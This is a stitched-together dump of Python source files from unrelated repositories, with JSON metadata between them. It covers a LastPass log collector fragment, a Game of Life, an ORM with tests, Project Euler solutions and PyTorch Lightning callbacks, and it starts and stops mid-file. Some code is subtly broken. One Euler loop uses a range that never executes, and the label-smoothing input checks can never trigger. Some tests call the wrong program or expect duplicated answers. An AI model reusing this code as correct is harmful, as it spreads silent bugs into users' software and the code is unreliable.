users[user].get('attribs').update({'password': hashlib.sha1(users[user].get('attribs').get('password').encode()).hexdigest()})
event = helper.new_event(data=json.dumps(users[user]),
time=time_val,
source=helper.get_input_type(),
index=helper.get_output_index(),
sourcetype=helper.get_sourcetype())
ew.write_event(event)
iter_group = resp_ev_json.get('Groups') if resp_ev_json.get('Groups') else {}
for idx_group, group in enumerate(iter_group):
groups[group] = {}
groups[group]['members'] = copy.deepcopy(resp_ev_json.get('Groups')[group])
groups[group]['count'] = len(resp_ev_json.get('Groups')[group])
groups[group]['group_id'] = group
groups[group]['time_collected'] = time_val
groups[group]['event'] = 'list_groups'
chk_group = idx_group
if idx_group % 10 == 0:
time_val = datetime.datetime.now().timestamp()
# can only specify one sourcetype per input, hardcode for groups
event = helper.new_event(data=json.dumps(groups[group]),
time=time_val,
source=helper.get_input_type(),
index=helper.get_output_index(),
sourcetype='lastpass:groups')
ew.write_event(event)
if resp_ev_json.get('invited') and not chk_invited:
invited = {}
invited['members'] = copy.deepcopy(resp_ev_json.get('invited'))
invited['count'] = len(resp_ev_json.get('invited'))
invited['time_collected'] = time_val
invited['event'] = 'list_invited'
# can only specify one sourcetype per input, hardcode for groups
event = helper.new_event(data=json.dumps(invited),
time=time_val,
source=helper.get_input_type(),
index=helper.get_output_index(),
sourcetype='lastpass:invited')
ew.write_event(event)
chk_invited = True
# break out if no more records to processes
if chk_user >= total or count < PAGE_SIZE:
helper.log_debug(f'LastPass identity collection. Reached end of user list: idx_user={chk_user}')
break
# increment page index to capture more user/group identities
PAGE_INDEX += 1
save_checkpoint(helper, chk_user, chk_group)
helper.log_debug(f'LastPass identity collection. Updating LastPass identity checkpoint: idx_user={chk_user} idx_group={chk_group}')
except Exception as e:
helper.log_critical(f'LastPass identity collection. idx_user={chk_user} idx_group={chk_group} Error in forwarding data: {traceback.format_exc()}')
raise e
helper.log_debug(f'LastPass identity collection. Complete: user identity collection. page_index={PAGE_INDEX} total_identities={total} current_count={count}')
```
|
{
"source": "Jexan/GameOfLife",
"score": 3
}
|
#### File: GameOfLife/src/func.py
```python
import game
import copy
import random
# Updates the location of cells and the generation
def update(dt):
if game.pause:
return
eliminate_adjacent()
game.generation += 1
game.generation_label.text = str(game.generation)
# Creates random cells at the star of the game
def randomize_board():
for i in range(game.random_cells):
game.board[random.randint(0,game.grid_count - 1)][random.randint(0,game.grid_count - 1)] = 1
# Blits the cells
def draw_board():
for index_y,y in enumerate(game.board):
for index_x,x in enumerate(y):
if x:
game.on.blit(index_x*game.tile_size, index_y*game.tile_size)
else:
game.off.blit(index_x*game.tile_size, index_y*game.tile_size)
# Checks if a cell lives or dies; N = North...
def eliminate_adjacent():
board_copy = copy.deepcopy(game.board)
for index_y,y in enumerate(game.board):
for index_x,x in enumerate(y):
neighboors = 0
if index_y != 0:
neighboors += game.board[index_y - 1][index_x] # N
if index_x < game.limit:
neighboors += game.board[index_y - 1][index_x + 1] # NE
neighboors += game.board[index_y][index_x + 1] # E
if index_x != 0:
neighboors += game.board[index_y - 1][index_x - 1] # NW
neighboors += game.board[index_y][index_x - 1] # W
if index_y < game.limit:
neighboors += game.board[index_y + 1][index_x] # S
if index_x < game.limit:
neighboors += game.board[index_y + 1][index_x + 1] # SE
if index_x != 0:
neighboors += game.board[index_y + 1][index_x - 1] # SW
if x == 0:
if neighboors == 3 or neighboors == 2:
board_copy[index_y][index_x] = 1
elif x == 1:
if neighboors != 2:
board_copy[index_y][index_x] = 0
game.board = board_copy
# Used for the restart too; 1 means a live cell, 0, a dead one
def start():
game.board = [[0 for y in range(game.grid_count)] for i in range(game.grid_count)]
game.limit = len(game.board) - 1
randomize_board()
game.generation = 0
game.generation_label.text = "0"
```
|
{
"source": "Jexan/OxygenRM",
"score": 2
}
|
#### File: OxygenRM/OxygenRM/__init__.py
```python
from OxygenRM.internals.SQLite3DB import *
internal_db = None
db = None
handle_events = False
emit_warnings = True
# Defines the database driver
def db_config(driver, db_name):
global internal_db, db
if driver == 'sqlite3':
internal_db = SQLite3DB(db_name)
db = internal_db
return internal_db
# Sets the database to a set database driver
def db_set():
pass
def transaction():
if not db:
raise RuntimeError('Cannot start a transaction with an unspecified database.')
else:
return db.transaction()
def use_events():
global handle_events
handle_events = True
def cancel_events():
global handle_events
handle_events = False
def warn(msg):
""" Print a warning, if they're enabled.
"""
if not emit_warnings:
return
else:
print(f'OxigenRM warning: {msg}')
```
#### File: OxygenRM/OxygenRM/pivot.py
```python
from OxygenRM.internals.QueryBuilder import QueryBuilder
from OxygenRM.internals.fields import Field, Relation
from OxygenRM.models import Model
import OxygenRM as O
class Pivot(Model):
""" The model class for ManyToMany middle table classes
"""
@classmethod
def _set_up_model(cls):
""" Set up the internals and relations of the Model
"""
cls._fields = dict()
cls._rel_queue = list()
cls._pivot_classes = dict()
for attr, value in cls.__dict__.items():
if isinstance(value, Field):
value._attr = attr
row_prop = property(fget=value.get, fset=value.set)
setattr(cls, attr, row_prop)
cls._fields[attr] = value
cls._set_up = True
def save(self, base_model=None):
values_for_db = {}
# The ids of the related models
self_id = getattr(self, self._self_name, None)
other_id = getattr(self, self._other_name, None)
if self_id is None or other_id is None:
raise ValueError('Cannot save pivot model if relation ids are None: {}:{} and {}:{}'.format(
self._self_name, self_id, self._other_name, other_id
))
if base_model == None:
for field_name, field_instance in self._fields.items():
values_for_db[field_name] = field_instance.db_set(self, self._field_values[field_name])
if self._creating_new:
O.db.create(self.table_name, **values_for_db)
def _update_values(self, values):
self._field_values = {}
for field, col in self._fields.items():
field_val = values.get(field, None)
self._field_values[field] = col.db_get(field_val)
@classmethod
def new(cls):
return cls()
def set_self_id(self, id):
""" Set the id of the initial model id for this row. (Useful for new model creation)
Args:
id: The value of the inital model id.
"""
setattr(self, self._self_name, id)
```
#### File: test/internals_test/test_columns.py
```python
import unittest
from OxygenRM.internals.columns import *
class T():
t = Text()
b = Bool()
i = Integer()
f = Float()
id = Id()
class TestColumns(unittest.TestCase):
def test_all_columns_classes_initialize(self):
""" Assure the columns classes constructor work
"""
t = Text()
b = Bool()
i = Integer()
f = Float()
i_d = Id()
self.assertIsInstance(t, Text)
self.assertIsInstance(b, Bool)
self.assertIsInstance(i, Integer)
self.assertIsInstance(f, Float)
self.assertIsInstance(i_d, Id)
```
#### File: test/model_tests/test_pickle_column.py
```python
from . import *
import pickle
class PickleModel(O.Model):
a = Pickle()
b = Pickle(list, strict=True)
c = Pickle(int)
d = Pickle(dict, ({'t': 1},))
class TestJSONFields(unittest.TestCase):
def setUp(self):
db.create_table('PickleModels', default_cols(a='blob', b='blob', c='blob', d='blob'))
def tearDown(self):
db.drop_table('PickleModels')
def test_model_initialization(self):
t1 = PickleModel()
self.assertIs(t1.a, None)
self.assertIsInstance(t1.b, list)
self.assertIsInstance(t1.c, int)
self.assertIsInstance(t1.d, dict)
self.assertEqual(t1.b, [])
self.assertEqual(t1.c, 0)
self.assertEqual(t1.d, {'t': 1})
def test_model_strict_changing_raises_TypeError(self):
t1 = PickleModel()
with self.assertRaises(TypeError):
t1.b = 42
def test_model_setting(self):
t1 = PickleModel()
t1.a = None
t1.c = 2.3
t1.d = False
self.assertEqual(t1.a, None)
self.assertEqual(t1.c, 2.3)
self.assertEqual(t1.d, False)
def test_saving_pickle_defaults(self):
t1 = PickleModel()
t1.save()
result = QueryBuilder.table('PickleModels').first()
self.assertEqual(result['a'], pickle.dumps(t1.a))
self.assertEqual(result['b'], pickle.dumps(t1.b))
self.assertEqual(result['c'], pickle.dumps(t1.c))
self.assertEqual(result['d'], pickle.dumps(t1.d))
def test_getting_loaded_picle(self):
t1 = PickleModel()
t1.save()
first = PickleModel.first()
self.assertEqual(first.a, None)
self.assertEqual(first.b, [])
self.assertEqual(first.d, {'t': 1})
def test_setting_pure_bytes(self):
t1 = PickleModel()
t1.a = pickle.dumps([1,2,3])
t1.save()
result = QueryBuilder.table('PickleModels').first()
self.assertEqual(result['a'], pickle.dumps([1,2,3]))
```
|
{
"source": "Jexan/ProjectEulerSolutions",
"score": 3
}
|
#### File: ProjectEulerSolutions/src/E002.py
```python
from .helpers import generate_fibonacci
LIMIT = 4000000
def sum_even_fibb_until(limit):
def mini_gen():
for n in generate_fibonacci():
if n >= limit:
return
if not n % 2:
yield n
return sum(mini_gen())
result = sum_even_fibb_until(LIMIT)
```
#### File: ProjectEulerSolutions/src/E007.py
```python
from .helpers import generate_primes
from itertools import islice
DUMMY_NTH = 6
DUMMY_RESULT = 13
NTH = 10001
def get_nth_prime(n):
return next(islice(generate_primes(), n-1, None))
assert get_nth_prime(DUMMY_NTH) == DUMMY_RESULT
result = get_nth_prime(NTH)
```
#### File: ProjectEulerSolutions/src/E009.py
```python
from math import gcd
LIMIT = 1000
def find_pythagorean_triple():
for a in range(1, 11):
for b in range(1, a):
if gcd(a, b) != 1 or (a % 2 and b % 2):
continue
perimeter = 2*(a**2 + a*b)
if perimeter > LIMIT: break
times = LIMIT // perimeter
for i in range(1, times+1):
if perimeter*i == LIMIT:
return i**3*(a**2-b**2)*(2*a*b)*(a**2+b**2)
result = find_pythagorean_triple()
```
#### File: ProjectEulerSolutions/src/E016.py
```python
DUMMY_EXPONENT = 15
DUMMY_RESULT = 26
EXPONENT = 1000
def sum_digits_n_power_of_2(exponent):
return sum(int(digit) for digit in str(2**exponent))
assert sum_digits_n_power_of_2(DUMMY_EXPONENT) == DUMMY_RESULT
result = sum_digits_n_power_of_2(EXPONENT)
```
#### File: ProjectEulerSolutions/src/E041.py
```python
from .helpers import primes_until
from itertools import permutations
from math import floor
limit = floor(987654321 ** .5)
primes = tuple(primes_until(limit))[3:]
def transform_to_num(t):
return int(''.join(t))
def is_prime(n):
if not n % 3:
return False
bound = floor(n**.5)
for p in primes:
if p > bound:
return True
elif not n % p:
return False
def get_result():
for n in range(9, 3, -1):
for i in permutations(str(s) for s in range(n, 0, -1)):
if i[-1] in '24685': continue
if is_prime(transform_to_num(i)):
return transform_to_num(i)
result = get_result()
```
#### File: ProjectEulerSolutions/src/E044.py
```python
from itertools import count
from math import sqrt, modf, inf
from .helpers import take
def generate_pent():
result = 1
for i in count(1):
yield result
result += 3*i + 1
def is_pent(n):
fractional, integer = modf(sqrt(1+24*n))
return fractional == 0 and not (integer + 1) % 6
def get_min_diff():
pents = set()
possible = set()
minimal = inf
last_pent = 0
for pent in generate_pent():
to_remove = set()
for i in pents:
subs = pent - i
if subs < minimal and subs in pents and is_pent(pent + i):
result = subs
minimal = subs
elif subs > minimal:
to_remove.add(i)
if minimal < pent - last_pent:
return result
pents.add(pent)
pents -= to_remove
last_pent = pent
result = get_min_diff()
```
#### File: ProjectEulerSolutions/src/E045.py
```python
from itertools import count
DUMMY_INIT = 140
DUMMY_RESULT = 40755
INIT = 144
def pentagonal_index(triangular):
return (1 + (1 + 12 * triangular * (triangular + 1))**.5) / 6
def triangular_index(hexagonal):
return (-1 + (1 + 8 * hexagonal * (2 * hexagonal - 1))**.5) / 2
def pentagonal(n):
return n*(3*n-1)/2
def generate_numbers_and_find_common(init_in):
for i in count(init_in):
triang = triangular_index(i)
if int(triang) == triang:
pent = pentagonal_index(triang)
if int(pent) == pent:
return pentagonal(int(pent))
assert generate_numbers_and_find_common(DUMMY_INIT) == DUMMY_RESULT
result = generate_numbers_and_find_common(INIT)
```
#### File: ProjectEulerSolutions/src/E049.py
```python
from .helpers import primes_until, find
from itertools import dropwhile, permutations, combinations
def permute_n(n):
return frozenset(int(''.join(per)) for per in permutations(str(n), 4))
def get_criteria_primes():
relevant_primes = tuple(dropwhile(lambda x: x < 1000, primes_until(10000)))
primes_set = set(relevant_primes)
possible = []
for prime in relevant_primes:
if prime not in primes_set:
continue
possible_primes = permute_n(prime) & primes_set
if len(possible_primes) >= 3:
numbers = sorted(possible_primes)
for triplet in combinations(numbers, 3):
if triplet[1] - triplet[0] == triplet[2] - triplet[1]:
possible.append(triplet)
primes_set -= possible_primes
return possible
criteria_primes = get_criteria_primes()
IS_DUMMY_VALUE = lambda b: (lambda x: 1487 in x) if b else (lambda x: 1487 not in x)
assert find(IS_DUMMY_VALUE(True) , criteria_primes)
result = int(''.join(str(i) for i in find(IS_DUMMY_VALUE(False), criteria_primes)))
```
#### File: ProjectEulerSolutions/src/E055.py
```python
from .helpers import is_palindrome
def is_lychrel(n):
current = n
for i in range(50):
result = current + int(str(current)[::-1])
if is_palindrome(result):
return False
current = result
return True
result = len(tuple(filter(is_lychrel, range(1, 10001))))
```
#### File: ProjectEulerSolutions/src/E076.py
```python
from functools import lru_cache
@lru_cache(None)
def reduce_num(to, current=0, max_in_chain=None):
if to == current:
return 1
else:
if not max_in_chain:
max_in_chain = to - 1
total = 0
for i in range(1, min(to-current, max_in_chain) + 1):
total += reduce_num(to, current+i, min(i, max_in_chain))
return total
result = reduce_num(100)
```
#### File: ProjectEulerSolutions/src/E087.py
```python
from .helpers import primes_until
from itertools import takewhile
from math import sqrt, floor
below = 50000000
def get_numbers_quantity():
limit_sq = floor(sqrt(below)) + 1
limit_cr = floor(below**(1/3)) + 1
limit_fr = floor(below**.25) + 1
sieve = tuple(primes_until(limit_sq))
# For some reason if the two last two primes collection is not tuplefied,
# the primes are not going to be yielded correctly.
squared_primes = (i**2 for i in sieve)
cubed_primes = tuple(j**3 for j in takewhile(lambda x: x < limit_cr, sieve))
fourth_primes = tuple(k**4 for k in takewhile(lambda x: x < limit_fr, sieve))
return len(set(filter(lambda x: x < below, (i + j + k for i in squared_primes for j in cubed_primes for k in fourth_primes))))
result = get_numbers_quantity()
```
#### File: ProjectEulerSolutions/src/E092.py
```python
LIMIT = 10000000
arrives_at_1 = {1:True, 89:False}
sum_of_digits = {str(i): i**2 for i in range(10)}
sum_of_digits[''] = 0
def get_digit_sum(n):
str_num = str(n)
last_digits = str_num[1:]
last_sum = sum_of_digits.get(last_digits)
if last_sum is None:
last_sum = get_digit_sum(last_digits)
sum_of_digit = sum_of_digits[str_num[0]] + last_sum
sum_of_digits[sum_of_digit] = sum_of_digit
return sum_of_digit
def n_numbers_who_arrive(limit):
for i in range(1, limit, -1):
n = i
if not n in arrives_at_1:
to_add = []
to_1 = False
while True:
n = get_digit_sum(n)
if n in arrives_at_1:
to_1 = arrives_at_1[n]
break
else:
to_add.append(n)
arrives_at_1[i] = to_1
for y in to_add:
arrives_at_1[y] = to_1
numbers_who_arrive = filter(lambda x: not arrives_at_1[x], arrives_at_1.keys())
return len(list(numbers_who_arrive))
result = n_numbers_who_arrive(LIMIT)
```
#### File: ProjectEulerSolutions/tests/test_complete_ok.py
```python
import unittest
import subprocess
import os
TESTING_NOW = 4
def get_haskell_output(n):
program = os.path.join(os.getcwd(), 'src', 'E{}'.format(n))
subprocess.run(['ghc', program + '.hs'])
return int(subprocess.check_output(program))
class TestCompleteChallengesYieldCorrectResults(unittest.TestCase):
def test_assure_given_ok(self):
challenge_number = str(TESTING_NOW)
zeroes_padding = '0' * (3 - len(challenge_number))
eval('assure_{}(self)'.format(zeroes_padding + challenge_number))
def assure_001(self):
from src.E001 import result
self.assertEqual(result, 233168)
def assure_002(self):
from src.E002 import result
self.assertEqual(result, 4613732)
def assure_003(self):
from src.E003 import result
self.assertEqual(result, 6857)
def assure_004(self):
from src.E004 import result
self.assertEqual(result, 906609)
def assure_005(self):
from src.E005 import result
self.assertEqual(result, 232792560)
def assure_006(self):
from src.E006 import result
self.assertEqual(result, 25164150)
def assure_007(self):
from src.E007 import result
self.assertEqual(result, 104743)
def assure_008(self):
from src.E008 import result
self.assertEqual(result, 23514624000)
def assure_009(self):
from src.E009 import result
self.assertEqual(result, 31875000)
def assure_010(self):
from src.E010 import result
self.assertEqual(result, 142913828922)
def assure_011(self):
from src.E011 import result
self.assertEqual(result, 70600674)
def assure_012(self):
result = get_haskell_output('012')
self.assertEqual(result, 76576500)
def assure_013(self):
from src.E013 import result
self.assertEqual(result, 5537376230)
def assure_014(self):
from src.E014 import result
self.assertEqual(result, 837799)
def assure_015(self):
from src.E015 import result
self.assertEqual(result, 137846528820)
def assure_016(self):
from src.E016 import result
self.assertEqual(result, 1366)
def assure_017(self):
from src.E017 import result
self.assertEqual(result, 21124)
def assure_018(self):
from src.E018 import result
self.assertEqual(result, 1074)
def assure_019(self):
from src.E019 import result
self.assertEqual(result, 171)
def assure_020(self):
from src.E020 import result
result2 = get_haskell_output('020')
self.assertEqual(result, result2)
self.assertEqual(result, 648)
def assure_021(self):
result = get_haskell_output('021')
self.assertEqual(result, 31626)
def assure_022(self):
from src.E022 import result
self.assertEqual(result, 871198282)
def assure_023(self):
from src.E023 import result
self.assertEqual(result, 4179871)
def assure_024(self):
from src.E024 import result
self.assertEqual(result, 2783915460)
def assure_025(self):
from src.E025 import result
self.assertEqual(result, 4782)
def assure_026(self):
from src.E026 import result
self.assertEqual(result, 983)
def assure_027(self):
from src.E027 import result
result2 = get_haskell_output('027')
self.assertEqual(result, result2)
self.assertEqual(result, -59231)
def assure_028(self):
from src.E028 import result
self.assertEqual(result, 669171001)
def assure_029(self):
from src.E029 import result
self.assertEqual(result, 9183)
def assure_030(self):
from src.E030 import result
self.assertEqual(result, 9183)
def assure_031(self):
from src.E031 import result
self.assertEqual(result, 73682)
def assure_032(self):
from src.E032 import result
self.assertEqual(result, 45228)
def assure_033(self):
from src.E033 import result
self.assertEqual(result, 100)
def assure_034(self):
from src.E034 import result
self.assertEqual(result, 40730)
def assure_035(self):
result = get_haskell_output('035')
self.assertEqual(result, 55)
def assure_036(self):
from src.E036 import result
self.assertEqual(result, 872187)
def assure_037(self):
from src.E037 import result
self.assertEqual(result, 748317)
def assure_038(self):
from src.E038 import result
self.assertEqual(result, 932718654)
def assure_039(self):
from src.E039 import result
self.assertEqual(result, 840)
def assure_040(self):
result = get_haskell_output('039')
self.assertEqual(result, 210)
def assure_041(self):
from src.E041 import result
self.assertEqual(result, 7652413)
def assure_042(self):
from src.E042 import result
self.assertEqual(result, 162)
def assure_043(self):
from src.E043 import result
self.assertEqual(result, 16695334890)
def assure_044(self):
from src.E044 import result
self.assertEqual(result, 5482660)
def assure_045(self):
from src.E045 import result
self.assertEqual(result, 1533776805)
def assure_046(self):
from src.E046 import result
self.assertEqual(result, 5777)
def assure_048(self):
from src.E048 import result
self.assertEqual(result, 9110846700)
def assure_049(self):
from src.E049 import result
self.assertEqual(result, 296962999629)
def assure_053(self):
from src.E053 import result
self.assertEqual(result, 4075)
def assure_054(self):
from src.E054 import result
self.assertEqual(result, 376)
def assure_055(self):
from src.E055 import result
self.assertEqual(result, 249)
def assure_056(self):
from src.E056 import result
self.assertEqual(result, 972)
def assure_057(self):
from src.E057 import result
result2 = get_haskell_output('057')
self.assertEqual(result, result2)
self.assertEqual(result, 153)
def assure_061(self):
from src.E061 import result
self.assertEqual(result, 28684)
def assure_063(self):
result = get_haskell_output('063')
self.assertEqual(result, 49)
def assure_065(self):
from src.E065 import result
self.assertEqual(result, 272)
def assure_069(self):
from src.E069 import result
self.assertEqual(result, 510510)
def assure_071(self):
from src.E071 import result
self.assertEqual(result, 428570)
def assure_072(self):
from src.E072 import result
self.assertEqual(result, 303963552391)
def assure_073(self):
from src.E073 import result
self.assertEqual(result, 7295372)
def assure_075(self):
from src.E075 import result
self.assertEqual(result, 161667)
def assure_076(self):
from src.E076 import result
self.assertEqual(result, 190569291)
def assure_087(self):
from src.E087 import result
self.assertEqual(result, 1097343)
def assure_092(self):
from src.E092 import result
self.assertEqual(result, 8581146)
def assure_097(self):
from src.E097 import result
self.assertEqual(result, 8739992577)
```
#### File: ProjectEulerSolutions/tests/test_helpers_methods.py
```python
from src.helpers import *
import unittest
class HelpersTests(unittest.TestCase):
def test_generate_fibonacci(self):
first_fib = (1, 1, 2, 3, 5, 8, 13, 21)
self.assertEqual(tuple(take(8, generate_fibonacci())), first_fib)
def test_primes_until_works_ok(self):
first_primes = (2, 3, 5, 7, 11, 13, 17, 19)
self.assertEqual(tuple(primes_until(20)), first_primes)
def test_is_palindrome(self):
self.assertTrue(is_palindrome(12321))
self.assertTrue(is_palindrome(123321))
self.assertTrue(is_palindrome(11))
self.assertTrue(is_palindrome(12388321))
self.assertFalse(is_palindrome(1234))
self.assertFalse(is_palindrome(-123))
self.assertFalse(is_palindrome(10))
def test_mcm(self):
self.assertEqual(mcm(2, 4, 6), 12)
self.assertEqual(mcm(1, 3), 3)
self.assertEqual(mcm(1, 2, 3, 4, 5), 60)
```
|
{
"source": "jexio/fulmo",
"score": 3
}
|
#### File: fulmo/callbacks/dropout.py
```python
from typing import Dict
import pytorch_lightning as pl
import torch
from .base import BaseCallback
class ScheduledDropoutCallback(BaseCallback):
"""Slowly changes dropout value for `attr_name` each epoch.
Ref: https://arxiv.org/abs/1703.06229
Attributes:
epochs: num epochs to max dropout to fully take effect
attr_name: name of dropout block in model
"""
def __init__(self, epochs: int = 10, attr_name: str = "dropout.p") -> None:
"""Create a new instance of `ScheduledDropoutCallback`"""
super().__init__()
self.epochs = epochs
self.attr_name = attr_name
self._dropout_rates: Dict[torch.nn.Module, float] = dict()
def on_before_accelerator_backend_setup(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Initialize dictionary contains initial probabilities."""
module = getattr(pl_module.model, self.attr_name)
if isinstance(module, torch.nn.Sequential):
for layer in module.children():
if isinstance(layer, torch.nn.Dropout):
self._dropout_rates[layer] = layer.p
def on_train_epoch_end(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Changes dropout value."""
module = getattr(pl_module.model, self.attr_name)
if isinstance(module, torch.nn.Sequential):
for layer in module.children():
if isinstance(layer, torch.nn.Dropout):
current_rate = self._dropout_rates[layer] * min(1, pl_module.current_epoch / self.epochs)
layer.p = current_rate
__all__ = ["ScheduledDropoutCallback"]
```
#### File: fulmo/callbacks/ema.py
```python
from copy import deepcopy
from typing import Dict, Optional
import pytorch_lightning as pl
import torch
import torch.nn as nn
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from .base import BaseCallback
class EmaCallback(BaseCallback):
"""Callback that perform EMA.
Model Exponential Moving Average. Empirically it has been found that using the moving average
of the trained parameters of a deep network is better than using its trained parameters directly.
"""
def __init__(
self,
ema_decay_per_epoch: float = 0.3,
apply_on_epoch: Optional[int] = None,
stop_after_epoch: Optional[int] = None,
every_n_step: Optional[int] = 10,
use_num_updates: bool = True,
device: Optional[str] = None,
) -> None:
"""Create a new instance of EmaCallback."""
super().__init__(apply_on_epoch, stop_after_epoch)
if device is not None and not isinstance(device, str):
raise MisconfigurationException(f"device is expected to be a torch.device or a str. Found {device}")
self._every_n_step = every_n_step
self._device = device
self._ema_decay_per_epoch = ema_decay_per_epoch
self._model_contains_batch_norm: Optional[bool] = None
self._num_updates: Optional[int] = 0 if use_num_updates else None
self._decay: Optional[float] = None
self._average_model: Optional[pl.LightningModule] = None
self._accumulate_grad_batches: Optional[int] = None
self.momenta: Dict[nn.Module, float] = {}
@staticmethod
def _pl_module_contains_batch_norm(pl_module: pl.LightningModule) -> bool:
"""Check if there are _BatchNorm layers."""
return any(isinstance(module, nn.modules.batchnorm._BatchNorm) for module in pl_module.modules())
@staticmethod
def _copy_to(src_pl_module: pl.LightningModule, dst_pl_module: pl.LightningModule) -> None:
"""Copy parameters from `src_pl_module` to `dst_pl_module`."""
for src_param, dst_param in zip(src_pl_module.parameters(), dst_pl_module.parameters()):
dst_param.detach().copy_(src_param.to(dst_param.device))
def _reset_batch_norm_and_save_state(self, pl_module: pl.LightningModule) -> None:
"""Adapted from https://github.com/pytorch/pytorch/blob/v1.7.1/torch/optim/swa_utils.py#L140-L154."""
self.momenta = {}
for module in pl_module.modules():
if not isinstance(module, nn.modules.batchnorm._BatchNorm):
continue
module.running_mean = torch.zeros_like(
module.running_mean, device=pl_module.device, dtype=module.running_mean.dtype
)
module.running_var = torch.ones_like(
module.running_var, device=pl_module.device, dtype=module.running_var.dtype
)
self.momenta[module] = module.momentum
module.momentum = None
module.num_batches_tracked *= 0
def _reset_momenta(self) -> None:
"""Adapted from https://github.com/pytorch/pytorch/blob/v1.7.1/torch/optim/swa_utils.py#L164-L165."""
for bn_module in self.momenta:
bn_module.momentum = self.momenta[bn_module]
def on_before_accelerator_backend_setup(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Prepare values and a lightning-module."""
# copy the model before moving it to accelerator device.
super().on_before_accelerator_backend_setup(trainer, pl_module)
self._decay = self._ema_decay_per_epoch ** (1 / len(trainer.datamodule.data_train)) # type: ignore[attr-defined]
with pl_module._prevent_trainer_and_dataloaders_deepcopy():
self._average_model = deepcopy(pl_module)
def on_fit_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Called when fit begins."""
optimizers = trainer.optimizers
lr_schedulers = trainer.lr_schedulers
if len(optimizers) != 1:
raise MisconfigurationException("EMA currently works with 1 `optimizer`.")
if len(lr_schedulers) > 1:
raise MisconfigurationException("EMA currently not supported for more than 1 `lr_scheduler`.")
self._model_contains_batch_norm = self._pl_module_contains_batch_norm(pl_module)
if self._model_contains_batch_norm:
# virtually increase max_epochs to perform batch norm update on latest epoch.
trainer.fit_loop.max_epochs += 1
def on_train_epoch_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Called when the train epoch begins."""
super().on_train_epoch_start(trainer, pl_module)
if trainer.current_epoch == self.apply_on_epoch:
# move average model to request device.
self._average_model = self._average_model.to(self._device or pl_module.device)
if self.apply_on_epoch <= trainer.current_epoch <= self.stop_after_epoch:
gs = trainer.global_step
if gs % self._every_n_step == 0:
self.update_parameters(self._average_model, pl_module)
# Note: No > here in case the callback is saved with the model and training continues
if trainer.current_epoch == self.stop_after_epoch + 1:
# Transfer weights from average model to pl_module
self._copy_to(self._average_model, pl_module)
# Reset BatchNorm for update
self._reset_batch_norm_and_save_state(pl_module)
# There is no need to perform either backward or optimizer.step as we are
# performing only one pass over the train data-loader to compute activation statistics
# Therefore, we will virtually increase `num_training_batches` by 1 and skip backward.
trainer.num_training_batches += 1
trainer.fit_loop._skip_backward = True
self._accumulate_grad_batches = trainer.accumulate_grad_batches
trainer.accumulate_grad_batches = trainer.num_training_batches
def on_train_epoch_end(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Called when the train epoch ends."""
super().on_train_epoch_end(trainer, pl_module)
trainer.fit_loop._skip_backward = False
def on_train_end(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Called when the train ends."""
if self._model_contains_batch_norm and trainer.current_epoch == self.stop_after_epoch + 1:
# BatchNorm epoch update. Reset state
trainer.accumulate_grad_batches = self._accumulate_grad_batches
trainer.num_training_batches -= 1
trainer.fit_loop.max_epochs -= 1
self._reset_momenta()
elif trainer.current_epoch == self.stop_after_epoch:
# Last EMA epoch. Transfer weights from average model to pl_module
self._copy_to(self._average_model, pl_module)
def update_parameters(self, average_model: pl.LightningModule, model: pl.LightningModule) -> None:
"""Update currently maintained parameters.
Call this every time the parameters are updated, such as the result of the `optimizer.step()` call.
Args:
average_model: Usually shadow parameters.
model: Usually the same set of parameters used to initialize this object.
"""
decay = self._decay
if self._num_updates is not None:
self._num_updates += 1
decay = min(decay, (1 + self._num_updates) / (10 + self._num_updates))
one_minus_decay = 1.0 - decay
with torch.no_grad():
for s_param, param in zip(average_model.parameters(), model.parameters()):
param_ = param.to(s_param.device)
s_param.sub_(one_minus_decay * (s_param - param_))
__all__ = ["EmaCallback"]
```
#### File: fulmo/losses/online_smooth.py
```python
import torch
import torch.nn as nn
class OnlineLabelSmoothing(nn.Module):
"""Implements Online Label Smoothing from paper https://arxiv.org/pdf/2011.12562.pdf."""
def __init__(self, n_classes: int, alpha: float, smoothing: float = 0.1) -> None:
"""Create a new instance of `OnlineLabelSmoothing`.
Args:
n_classes: Number of classes of the classification problem
alpha: Term for balancing soft_loss and hard_loss
smoothing: Smoothing factor to be used during first epoch in soft_loss
Raises:
ValueError: if `alpha` or `smoothing` greater than 1 or less than 0
"""
super(OnlineLabelSmoothing, self).__init__()
if 0.0 > alpha > 1.0:
raise ValueError("alpha must be in range [0, 1].")
if 0.0 > smoothing > 1.0:
raise ValueError("smoothing must be in range [0, 1].")
self._alpha = alpha
self._n_classes = n_classes
# With alpha / (n_classes - 1) ----> Alternative
self.register_buffer("supervise", torch.zeros(n_classes, n_classes))
self.supervise.fill_(smoothing / (n_classes - 1))
self.supervise.fill_diagonal_(1 - smoothing)
# Update matrix is used to supervise next epoch
self.register_buffer("update", torch.zeros_like(self.supervise))
# For normalizing we need a count for each class
self.register_buffer("idx_count", torch.zeros(n_classes))
self.hard_loss = nn.CrossEntropyLoss()
def forward(self, outputs: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
"""Calculate the final loss."""
soft_loss = self.soft_loss(outputs, target)
hard_loss = self.hard_loss(outputs, target)
return self._alpha * hard_loss + (1 - self._alpha) * soft_loss
def soft_loss(self, outputs: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
"""Calculates the soft loss and calls step to update `update`.
Args:
outputs: Predicted logits.
target: Ground truth labels.
Returns:
Calculates the soft loss based on current supervise matrix.
"""
outputs = outputs.log_softmax(dim=-1)
with torch.no_grad():
self.step(outputs.exp(), target)
true_dist = torch.index_select(self.supervise, 1, target).swapaxes(-1, -2)
return torch.mean(torch.sum(-true_dist * outputs, dim=-1))
def step(self, outputs: torch.Tensor, target: torch.Tensor) -> None:
"""Updates `update` with the probabilities of the correct predictions and updates `idx_count` counter.
Steps:
1. Calculate correct classified examples.
2. Filter `outputs` based on the correct classified.
3. Add `y_h_f` rows to the `j` (based on y_h_idx) column of `memory`.
4. Keep count of # samples added for each `y_h_idx` column.
5. Average memory by dividing column-wise by result of step (4).
Note on (5): This is done outside this function since we only need to
normalize at the end of the epoch.
Args:
